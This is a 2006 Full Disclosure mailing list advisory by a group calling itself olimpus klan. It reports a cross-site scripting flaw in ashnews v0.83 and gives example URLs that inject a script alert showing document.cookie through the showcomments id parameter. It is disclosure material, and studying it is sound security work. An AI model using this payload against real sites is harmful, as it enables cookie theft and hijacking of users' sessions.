Full Disclosure mailing list archives
ashnews Cross-Site Scripting Vulnerability
From: zeus olimpusklan <zeus.olimpusklan () gmail com>
Date: Mon, 30 Jan 2006 10:21:40 -0600
########################################################################### # Advisory #5 Title: ashnews Cross-Site Scripting Vulnerability # # # Author: 0o_zeus_o0 and fraude # Contact: zeus () diosdelared com # Website: Elitemexico.org # Date: 30/01/2006 # Risk: High # Vendor Url: http://dev.ashwebstudio.com/ # Affected Software: ashnews # Non Affected: # # We Are: olimpus klan team # #TECHNICAL INFO #================================================================ # #vulnerability that allows to the robbery of cookie and kidnapping of user # # #Example: # #http://www.url.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert( document.cookie)</script> # #http://www.url.com/[path]/ashnews.php?page=showcomments&id=[xss] # # #Solution: # # # # #VULNERABLE VERSIONS #================================================================ #ashnews v0.83 Other versions may also be affected. # # #================================================================ #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.olimpusklan.org #================================================================ #greetz: lady fire,Mi beba, fraude and security-mx ##############################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ashnews Cross-Site Scripting Vulnerability zeus olimpusklan (Jan 30)
- Re: ashnews Cross-Site Scripting Vulnerability Dan B UK (Jan 30)
- Re: ashnews Cross-Site Scripting Vulnerability George A. Theall (Jan 30)
- Re: ashnews Cross-Site Scripting Vulnerability DanB-FD (Jan 31)
- Re: ashnews Cross-Site Scripting Vulnerability DanB-FD (Jan 31)
- Re: ashnews Cross-Site Scripting Vulnerability George A. Theall (Jan 30)
- Re: ashnews Cross-Site Scripting Vulnerability Dan B UK (Jan 30)